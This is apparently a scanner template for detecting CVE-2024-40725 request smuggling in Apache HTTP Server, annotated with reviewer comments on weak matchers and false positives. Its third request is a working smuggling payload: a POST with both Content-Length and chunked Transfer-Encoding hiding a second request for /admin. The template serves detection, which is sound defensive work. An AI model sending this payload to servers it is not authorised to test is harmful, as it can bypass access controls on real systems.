CVE-2024-40725

Apache HTTP Server Request Smuggling

# Template identifier; it repeats the CVE id used in info.name below.
id: CVE-2024-40725
info:
  name: Apache HTTP Server HTTP Request Smuggling (CVE-2024-40725)
  author: Redflare Cyber
  # NOTE(review): severity and the request-smuggling classification are the
  # template author's; the only reference below is a third-party repository.
  # Confirm the issue class and affected versions against the Apache HTTP
  # Server security advisory for this CVE before acting on a hit.
  severity: high
  description: Detects the presence of CVE-2024-40725 vulnerability in Apache HTTP Server using HTTP Request Smuggling techniques.
  # The referenced repository name also carries a second CVE id
  # (CVE-2024-40898); this template only reports under the id above.
  reference:
    - https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898
  tags: cve, http-request-smuggling, apache, mod_proxy

# Each list entry below carries its own matchers.
# NOTE(review): presumably a match on any single entry reports this template
# id, so the banner-only check in this first entry can raise a finding on its
# own. Confirm against the scanner's behaviour.
requests:
  # Request 1: plain GET used only to read the Server response header.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    # Captures the advertised version string under the name server_version.
    extractors:
      - type: regex
        part: header
        regex:
          - "Server: Apache/2\\.4\\.[0-5][0-9]"
          - "Server: Apache/2\\.4\\.6[0-1]"
        name: server_version

    # Banner fingerprint: matches a Server header advertising Apache 2.4 with a
    # two-digit patch level 00-59 or 60-61. Single-digit patch levels (for
    # example 2.4.9) do not match because two digits are required.
    # NOTE(review): a banner match alone is not evidence of the vulnerability.
    # The header can be suppressed or altered, and distribution packages may
    # backport fixes without changing the version string.
    matchers:
      - type: regex
        part: header
        regex:
          - "Server: Apache/2\\.4\\.[0-5][0-9]"
          - "Server: Apache/2\\.4\\.6[0-1]"

  # Request 2: GET whose Connection header lists Proxy-Authenticate next to
  # Keep-Alive.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Connection: Keep-Alive, Proxy-Authenticate

    # Matches when the string "Proxy-Authenticate" appears anywhere in the
    # response headers.
    # NOTE(review): Proxy-Authenticate is an ordinary response header on
    # proxies that ask for credentials, so this match does not by itself
    # indicate the CVE. There is no version or status condition here; treat a
    # hit as a lead for manual verification.
    matchers:
      - type: regex
        part: header
        regex:
          - "Proxy-Authenticate"

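  # Request 3: POST carrying both Content-Length and Transfer-Encoding, with a
  # second request line for /admin placed after the terminating chunk.
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 0
        Transfer-Encoding: chunked

        0

        GET /admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: smuggle-test

    # Require every matcher below to hold. Without this key the matchers are
    # OR-ed, so any 200 response, or any body containing "admin", would be
    # reported as a finding.
    matchers-condition: and
    # NOTE(review): even with both conditions, a 200 page containing the word
    # "admin" is common on unaffected sites, and the check does not look at
    # the Server version. Treat a hit as a lead for manual verification.
    matchers:
      - type: word
        part: body
        words:
          - "admin"
      - type: status
        status:
          - 200

    # Captures the advertised version string under the name server_version,
    # using the same two-digit patch-level patterns as the first request.
    extractors:
      - type: regex
        part: header
        regex:
          - "Server: Apache/2\\.4\\.[0-5][0-9]"
          - "Server: Apache/2\\.4\\.6[0-1]"
        name: server_version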
